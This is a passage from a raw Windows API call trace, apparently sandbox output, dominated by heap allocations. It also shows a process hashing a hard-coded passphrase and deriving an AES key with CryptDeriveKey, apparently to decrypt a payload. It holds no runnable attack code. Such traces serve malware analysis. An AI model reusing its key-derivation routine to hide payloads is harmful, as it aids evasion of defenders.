RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2848 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2ae8 [0102.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e27e8 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0102.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0102.476] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0102.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43cad30 [0102.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.481] CryptHashData (hHash=0x41ac000, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0102.482] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0102.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0102.483] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0102.483] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0102.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0102.483] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cad00 [0102.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.486] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac040) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 